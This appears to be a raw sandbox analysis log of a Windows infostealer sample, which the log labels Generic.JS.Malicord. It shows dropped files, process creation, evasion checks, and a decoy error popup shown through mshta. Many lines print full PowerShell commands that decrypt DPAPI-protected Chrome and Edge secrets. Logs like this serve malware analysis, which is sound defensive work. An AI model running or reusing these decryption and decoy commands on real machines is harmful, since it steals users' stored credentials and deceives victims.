Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\075aadb5-2846-420f-98d8-32c9141ac90f.tmp.node
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\d3dcompiler_47.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nskDB69.tmp\7z-out\vk_swiftshader.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\libEGL.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nskDB69.tmp\7z-out\libGLESv2.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nskDB69.tmp\7z-out\resources\elevate.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nskDB69.tmp\7z-out\libEGL.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nskDB69.tmp\7z-out\vulkan-1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2140 Thread sleep count: 3664 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2964 Thread sleep count: 2538 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2820 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2576 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3656 Thread sleep count: 2995 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3656 Thread sleep count: 1700 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5228 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5820 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\d0010809
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe File Volume queried: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe File Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe File Volume queried: C:\Users\user FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe File opened: C:\Users\user
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe File opened: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\resources
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe File opened: C:\Users\user\AppData
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe File opened: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe File opened: C:\Users\user\AppData\Local
Source: libGLESv2.dll.0.dr Binary or memory string: VMware
Source: libGLESv2.dll.0.dr Binary or memory string: IIAMDARMAppleBroadcomGoogleIntelMesaMicrosoftNVIDIAImagination TechnologiesQualcommSamsung Electronics Co., Ltd.VivanteVMwareTestX
Source: libGLESv2.dll.0.dr Binary or memory string: (IsLinux() && isVMWare) || (IsAndroid() && isNvidia) || (IsAndroid() && GetAndroidSdkLevel() < 27 && IsAdreno5xxOrOlder(functions)) || (IsAndroid() && IsMaliT8xxOrOlder(functions)) || (IsAndroid() && IsMaliG31OrOlder(functions))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Windows\System32\tasklist.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Process created: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe "C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\Setup" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1636 --field-trial-handle=1840,i,8366561825725198397,2739281923714538764,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,220,99,52,70,203,13,214,237,172,78,180,7,135,132,222,56,192,222,60,122,2,71,120,79,2,110,200,30,117,75,45,64,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,84,96,129,36,148,225,154,120,74,75,125,156,249,147,149,248,25,11,154,223,250,69,31,112,70,8,1,93,107,120,136,224,48,0,0,0,6,45,27,130,158,227,72,112,46,16,20,247,121,185,158,95,106,75,104,237,172,49,168,214,157,137,66,208,86,220,45,252,169,85,86,184,103,83,137,130,133,35,244,129,44,127,163,72,64,0,0,0,35,18,109,136,80,52,198,238,200,236,226,120,27,146,160,174,71,84,66,203,39,169,215,160,227,44,242,154,161,64,187,142,165,157,66,1,229,116,228,177,236,99,223,240,230,79,21,58,53,251,1,129,235,77,36,48,152,174,95,142,72,93,217,72), $null, 'CurrentUser')" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,14,53,24,103,59,147,206,28,42,108,2,171,66,248,59,252,178,162,35,232,127,115,109,155,94,76,82,107,203,163,4,197,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,102,39,139,236,68,70,39,152,67,111,123,34,177,197,103,181,124,213,190,112,13,193,185,90,191,194,52,69,126,126,90,70,48,0,0,0,78,43,108,139,184,233,18,30,79,160,62,90,54,145,175,184,1,206,218,146,139,219,218,40,3,209,83,56,71,210,79,189,120,174,46,157,101,81,201,76,77,181,151,119,46,253,183,146,64,0,0,0,25,132,83,220,77,72,234,147,112,233,192,145,190,240,42,192,38,154,220,71,203,164,145,111,115,55,19,193,38,168,21,189,120,226,128,178,203,174,136,16,121,184,133,15,28,247,227,66,0,254,38,112,15,247,17,81,12,63,142,85,32,243,79,251), $null, 'CurrentUser')" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Process created: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe "C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\Setup" --mojo-platform-channel-handle=2076 --field-trial-handle=1840,i,8366561825725198397,2739281923714538764,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "start /B cmd /c mshta "javascript:new ActiveXObject('WScript.Shell').Popup('An error occurred while downloading files. Please try again later.', 0, 'Error', 16);close()""
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Process created: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe "C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="C:\Users\user\AppData\Roaming\Setup" --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2480 --field-trial-handle=1840,i,8366561825725198397,2739281923714538764,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,220,99,52,70,203,13,214,237,172,78,180,7,135,132,222,56,192,222,60,122,2,71,120,79,2,110,200,30,117,75,45,64,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,84,96,129,36,148,225,154,120,74,75,125,156,249,147,149,248,25,11,154,223,250,69,31,112,70,8,1,93,107,120,136,224,48,0,0,0,6,45,27,130,158,227,72,112,46,16,20,247,121,185,158,95,106,75,104,237,172,49,168,214,157,137,66,208,86,220,45,252,169,85,86,184,103,83,137,130,133,35,244,129,44,127,163,72,64,0,0,0,35,18,109,136,80,52,198,238,200,236,226,120,27,146,160,174,71,84,66,203,39,169,215,160,227,44,242,154,161,64,187,142,165,157,66,1,229,116,228,177,236,99,223,240,230,79,21,58,53,251,1,129,235,77,36,48,152,174,95,142,72,93,217,72), $null, 'CurrentUser') Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,14,53,24,103,59,147,206,28,42,108,2,171,66,248,59,252,178,162,35,232,127,115,109,155,94,76,82,107,203,163,4,197,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,102,39,139,236,68,70,39,152,67,111,123,34,177,197,103,181,124,213,190,112,13,193,185,90,191,194,52,69,126,126,90,70,48,0,0,0,78,43,108,139,184,233,18,30,79,160,62,90,54,145,175,184,1,206,218,146,139,219,218,40,3,209,83,56,71,210,79,189,120,174,46,157,101,81,201,76,77,181,151,119,46,253,183,146,64,0,0,0,25,132,83,220,77,72,234,147,112,233,192,145,190,240,42,192,38,154,220,71,203,164,145,111,115,55,19,193,38,168,21,189,120,226,128,178,203,174,136,16,121,184,133,15,28,247,227,66,0,254,38,112,15,247,17,81,12,63,142,85,32,243,79,251), $null, 'CurrentUser') Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c mshta "javascript:new ActiveXObject('WScript.Shell').Popup('An error occurred while downloading files. Please try again later.', 0, 'Error', 16);close()"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mshta.exe mshta "javascript:new ActiveXObject('WScript.Shell').Popup('An error occurred while downloading files. Please try again later.', 0, 'Error', 16);close()"
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Process created: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe "c:\users\user\appdata\local\temp\2efagdfganpog197yhkhbxawy9z\setup.exe" --type=gpu-process --user-data-dir="c:\users\user\appdata\roaming\setup" --gpu-preferences=uaaaaaaaaadgaaayaaaaaaaaaaaaaaaaaabgaaaaaaawaaaaaaaaaaaaaaaqaaaaaaaaaaaaaaaaaaaaaaaaaegaaaaaaaaasaaaaaaaaaayaaaaagaaabaaaaaaaaaagaaaaaaaaaaqaaaaaaaaaaaaaaaoaaaaeaaaaaaaaaabaaaadgaaaagaaaaaaaaacaaaaaaaaaa= --mojo-platform-channel-handle=1636 --field-trial-handle=1840,i,8366561825725198397,2739281923714538764,131072 --disable-features=sparerendererforsiteperprocess,winretrievesuggestionsonlyondemand /prefetch:2
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /d /s /c "powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,220,99,52,70,203,13,214,237,172,78,180,7,135,132,222,56,192,222,60,122,2,71,120,79,2,110,200,30,117,75,45,64,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,84,96,129,36,148,225,154,120,74,75,125,156,249,147,149,248,25,11,154,223,250,69,31,112,70,8,1,93,107,120,136,224,48,0,0,0,6,45,27,130,158,227,72,112,46,16,20,247,121,185,158,95,106,75,104,237,172,49,168,214,157,137,66,208,86,220,45,252,169,85,86,184,103,83,137,130,133,35,244,129,44,127,163,72,64,0,0,0,35,18,109,136,80,52,198,238,200,236,226,120,27,146,160,174,71,84,66,203,39,169,215,160,227,44,242,154,161,64,187,142,165,157,66,1,229,116,228,177,236,99,223,240,230,79,21,58,53,251,1,129,235,77,36,48,152,174,95,142,72,93,217,72), $null, 'currentuser')"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,220,99,52,70,203,13,214,237,172,78,180,7,135,132,222,56,192,222,60,122,2,71,120,79,2,110,200,30,117,75,45,64,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,84,96,129,36,148,225,154,120,74,75,125,156,249,147,149,248,25,11,154,223,250,69,31,112,70,8,1,93,107,120,136,224,48,0,0,0,6,45,27,130,158,227,72,112,46,16,20,247,121,185,158,95,106,75,104,237,172,49,168,214,157,137,66,208,86,220,45,252,169,85,86,184,103,83,137,130,133,35,244,129,44,127,163,72,64,0,0,0,35,18,109,136,80,52,198,238,200,236,226,120,27,146,160,174,71,84,66,203,39,169,215,160,227,44,242,154,161,64,187,142,165,157,66,1,229,116,228,177,236,99,223,240,230,79,21,58,53,251,1,129,235,77,36,48,152,174,95,142,72,93,217,72), $null, 'currentuser')
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /d /s /c "powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,14,53,24,103,59,147,206,28,42,108,2,171,66,248,59,252,178,162,35,232,127,115,109,155,94,76,82,107,203,163,4,197,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,102,39,139,236,68,70,39,152,67,111,123,34,177,197,103,181,124,213,190,112,13,193,185,90,191,194,52,69,126,126,90,70,48,0,0,0,78,43,108,139,184,233,18,30,79,160,62,90,54,145,175,184,1,206,218,146,139,219,218,40,3,209,83,56,71,210,79,189,120,174,46,157,101,81,201,76,77,181,151,119,46,253,183,146,64,0,0,0,25,132,83,220,77,72,234,147,112,233,192,145,190,240,42,192,38,154,220,71,203,164,145,111,115,55,19,193,38,168,21,189,120,226,128,178,203,174,136,16,121,184,133,15,28,247,227,66,0,254,38,112,15,247,17,81,12,63,142,85,32,243,79,251), $null, 'currentuser')"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,14,53,24,103,59,147,206,28,42,108,2,171,66,248,59,252,178,162,35,232,127,115,109,155,94,76,82,107,203,163,4,197,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,102,39,139,236,68,70,39,152,67,111,123,34,177,197,103,181,124,213,190,112,13,193,185,90,191,194,52,69,126,126,90,70,48,0,0,0,78,43,108,139,184,233,18,30,79,160,62,90,54,145,175,184,1,206,218,146,139,219,218,40,3,209,83,56,71,210,79,189,120,174,46,157,101,81,201,76,77,181,151,119,46,253,183,146,64,0,0,0,25,132,83,220,77,72,234,147,112,233,192,145,190,240,42,192,38,154,220,71,203,164,145,111,115,55,19,193,38,168,21,189,120,226,128,178,203,174,136,16,121,184,133,15,28,247,227,66,0,254,38,112,15,247,17,81,12,63,142,85,32,243,79,251), $null, 'currentuser')
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Process created: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe "c:\users\user\appdata\local\temp\2efagdfganpog197yhkhbxawy9z\setup.exe" --type=utility --utility-sub-type=network.mojom.networkservice --lang=en-gb --service-sandbox-type=none --user-data-dir="c:\users\user\appdata\roaming\setup" --mojo-platform-channel-handle=2076 --field-trial-handle=1840,i,8366561825725198397,2739281923714538764,131072 --disable-features=sparerendererforsiteperprocess,winretrievesuggestionsonlyondemand /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Process created: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe "c:\users\user\appdata\local\temp\2efagdfganpog197yhkhbxawy9z\setup.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="c:\users\user\appdata\roaming\setup" --gpu-preferences=uaaaaaaaaadoaaayaaaaaaaaaaaaaaaaaabgaaaaaaawaaaaaaaaaaaaaacqaaaaaaaaaaaaaaaaaaaaaaaaaegaaaaaaaaasaaaaaaaaaayaaaaagaaabaaaaaaaaaagaaaaaaaaaaqaaaaaaaaaaaaaaaoaaaaeaaaaaaaaaabaaaadgaaaagaaaaaaaaacaaaaaaaaaa= --mojo-platform-channel-handle=2480 --field-trial-handle=1840,i,8366561825725198397,2739281923714538764,131072 --disable-features=sparerendererforsiteperprocess,winretrievesuggestionsonlyondemand /prefetch:2
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Process created: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe "c:\users\user\appdata\local\temp\2efagdfganpog197yhkhbxawy9z\setup.exe" --type=gpu-process --user-data-dir="c:\users\user\appdata\roaming\setup" --gpu-preferences=uaaaaaaaaadgaaayaaaaaaaaaaaaaaaaaabgaaaaaaawaaaaaaaaaaaaaaaqaaaaaaaaaaaaaaaaaaaaaaaaaegaaaaaaaaasaaaaaaaaaayaaaaagaaabaaaaaaaaaagaaaaaaaaaaqaaaaaaaaaaaaaaaoaaaaeaaaaaaaaaabaaaadgaaaagaaaaaaaaacaaaaaaaaaa= --mojo-platform-channel-handle=1636 --field-trial-handle=1840,i,8366561825725198397,2739281923714538764,131072 --disable-features=sparerendererforsiteperprocess,winretrievesuggestionsonlyondemand /prefetch:2 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /d /s /c "powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,220,99,52,70,203,13,214,237,172,78,180,7,135,132,222,56,192,222,60,122,2,71,120,79,2,110,200,30,117,75,45,64,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,84,96,129,36,148,225,154,120,74,75,125,156,249,147,149,248,25,11,154,223,250,69,31,112,70,8,1,93,107,120,136,224,48,0,0,0,6,45,27,130,158,227,72,112,46,16,20,247,121,185,158,95,106,75,104,237,172,49,168,214,157,137,66,208,86,220,45,252,169,85,86,184,103,83,137,130,133,35,244,129,44,127,163,72,64,0,0,0,35,18,109,136,80,52,198,238,200,236,226,120,27,146,160,174,71,84,66,203,39,169,215,160,227,44,242,154,161,64,187,142,165,157,66,1,229,116,228,177,236,99,223,240,230,79,21,58,53,251,1,129,235,77,36,48,152,174,95,142,72,93,217,72), $null, 'currentuser')" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /d /s /c "powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,14,53,24,103,59,147,206,28,42,108,2,171,66,248,59,252,178,162,35,232,127,115,109,155,94,76,82,107,203,163,4,197,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,102,39,139,236,68,70,39,152,67,111,123,34,177,197,103,181,124,213,190,112,13,193,185,90,191,194,52,69,126,126,90,70,48,0,0,0,78,43,108,139,184,233,18,30,79,160,62,90,54,145,175,184,1,206,218,146,139,219,218,40,3,209,83,56,71,210,79,189,120,174,46,157,101,81,201,76,77,181,151,119,46,253,183,146,64,0,0,0,25,132,83,220,77,72,234,147,112,233,192,145,190,240,42,192,38,154,220,71,203,164,145,111,115,55,19,193,38,168,21,189,120,226,128,178,203,174,136,16,121,184,133,15,28,247,227,66,0,254,38,112,15,247,17,81,12,63,142,85,32,243,79,251), $null, 'currentuser')" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Process created: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe "c:\users\user\appdata\local\temp\2efagdfganpog197yhkhbxawy9z\setup.exe" --type=utility --utility-sub-type=network.mojom.networkservice --lang=en-gb --service-sandbox-type=none --user-data-dir="c:\users\user\appdata\roaming\setup" --mojo-platform-channel-handle=2076 --field-trial-handle=1840,i,8366561825725198397,2739281923714538764,131072 --disable-features=sparerendererforsiteperprocess,winretrievesuggestionsonlyondemand /prefetch:8 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Process created: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe "c:\users\user\appdata\local\temp\2efagdfganpog197yhkhbxawy9z\setup.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="c:\users\user\appdata\roaming\setup" --gpu-preferences=uaaaaaaaaadoaaayaaaaaaaaaaaaaaaaaabgaaaaaaawaaaaaaaaaaaaaacqaaaaaaaaaaaaaaaaaaaaaaaaaegaaaaaaaaasaaaaaaaaaayaaaaagaaabaaaaaaaaaagaaaaaaaaaaqaaaaaaaaaaaaaaaoaaaaeaaaaaaaaaabaaaadgaaaagaaaaaaaaacaaaaaaaaaa= --mojo-platform-channel-handle=2480 --field-trial-handle=1840,i,8366561825725198397,2739281923714538764,131072 --disable-features=sparerendererforsiteperprocess,winretrievesuggestionsonlyondemand /prefetch:2 Jump to behavior
